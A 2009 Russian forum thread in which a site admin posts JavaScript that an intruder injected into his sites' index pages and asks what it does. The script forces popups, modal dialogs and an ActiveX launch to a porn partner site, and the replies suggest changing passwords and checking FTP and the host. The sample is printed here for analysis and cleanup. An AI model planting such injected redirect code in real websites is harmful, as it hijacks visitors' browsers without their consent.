Программисты, подскажите!

Обсуждение всех прочих статей автора сайта (за исключением автобиографических)
Ответить
Аватара пользователя
afanas
Site Admin
Сообщения: 9419
Зарегистрирован: Пт окт 13, 2006 3:54 pm
Откуда: Москва
Контактная информация:

Программисты, подскажите!

Сообщение afanas » Вс янв 11, 2009 12:27 am

Вот такой текст мне тут вписали в страницы сайта afanas.ru и сайта 100km.ru, причём только в файлы с названием index (что наводит на мысли о роботе, скрипте и т.п.)
<!-- ad --><script language="JavaScript">
function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
setInterval("y()",300000);
</script>
<script language="javascript"><!--
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:800px; dialogHeight:600px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0;help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = "scrollbars=1,menubar=1,toolbar=1,location=1,person albar=1,status=1,resizable=1";
var exit = true;
var usePopDialog = true;
var isUsingSpecial = false;
function normal_exit(){
if(exit && !isUsingSpecial) {
exit = false;
window.open(popURL,"",popWindowOptions);}}
--></script>

<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

//--------------------------------------------------------------------------------

function ext()
{
if(exit)
{
exit=false;

if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}

//--------------------------------------------------------------------------------

function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}

//--------------------------------------------------------------------------------

function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}

//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");

//--------------------------------------------------------------------------------
</script>

<body STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps" onUnload="normal_exit()"><!-- /ad -->
1) То что он отсылает на порносайт я и так видел. А что он ещё делает?
2) Даты изменения файлов сегодняшние. Где можно посмотреть КАК были внесены изменения - по FTP, через админку хостинга, или вообще через сервер хостера...
3) Что ещё умного можно сделать кроме смены паролей?

Аватара пользователя
Сергей Шашков
Заслуженный участник
Сообщения: 184
Зарегистрирован: Вс мар 09, 2008 10:00 pm
Откуда: Москва
Контактная информация:

Сообщение Сергей Шашков » Вс янв 11, 2009 1:32 am

1.
Ну, насколько я понимаю javascript, ничего кроме этого он вроде не делает. Во всяком случае, данных никуда не отсылает, зато отправляет на порносайт надёжно.


2.
Единственная идея, которая приходит на ум: позвонить в администрацию хостинга и узнать это у них.
Во всяком случае, без их участия, по-моему, нельзя.
Ну, или играть в детектива: посмотреть точное время изменений, и попытаться понять, кто в это время был на сайте.


3.
Ну смена пароля на большой, случайный, с цифрами и заглавными буквами. И эта операция должна проделываться регулярно.
А вообще нужно пинать хостеров: если не взломан пароль или сам хостер, то это может происходить только с их молчаливого согласия.
- Вот человек стоит на распутье между жизнью и смертью. Как ему вести себя?
- Пресеки свою двойственность, и пусть меч один стоит спокойно против неба.
Nikon D90; Nikon 16-85mm F3.5-5.6 VR, Nikon AF 50mm f1.8; SB-600

Алексей Захаров
Сообщения: 8
Зарегистрирован: Вс янв 11, 2009 12:40 pm
Откуда: Москва
Контактная информация:

Сообщение Алексей Захаров » Вс янв 11, 2009 5:14 pm

В первом сообщении этой темы http://www.afanas.ru/forum/viewtopic.php?t=503
отправляет на сайт при просмотре отдельной фотографии с выложенных фоток вашего корпоратива

Аватара пользователя
afanas
Site Admin
Сообщения: 9419
Зарегистрирован: Пт окт 13, 2006 3:54 pm
Откуда: Москва
Контактная информация:

Сообщение afanas » Вс янв 11, 2009 5:18 pm

Алексей Захаров писал(а):В первом сообщении этой темы http://www.afanas.ru/forum/viewtopic.php?t=503
отправляет на сайт при просмотре отдельной фотографии с выложенных фоток вашего корпоратива
Ну там тоже есть индекс.хтм - вот я его и не дочистил...

RiderV
Ветеран форума
Сообщения: 1994
Зарегистрирован: Пн апр 27, 2009 1:45 pm

Сообщение RiderV » Сб авг 08, 2009 1:26 pm

shst:
ну там 3 варианта,
1 комп у него аражен вирусом и он заходил по фтп
2 вирус у хостера
3 есть где то в сайте дырка через которую сделали ньекцию
4 ртое сперли пароль от фтп , опять же есть куча вирей которые прут пасы от фтп

2 е очень сомнительное, первое тоже легко отмести если он не заходил
3 тье в полне возможно сделано как раз через форум

Ответить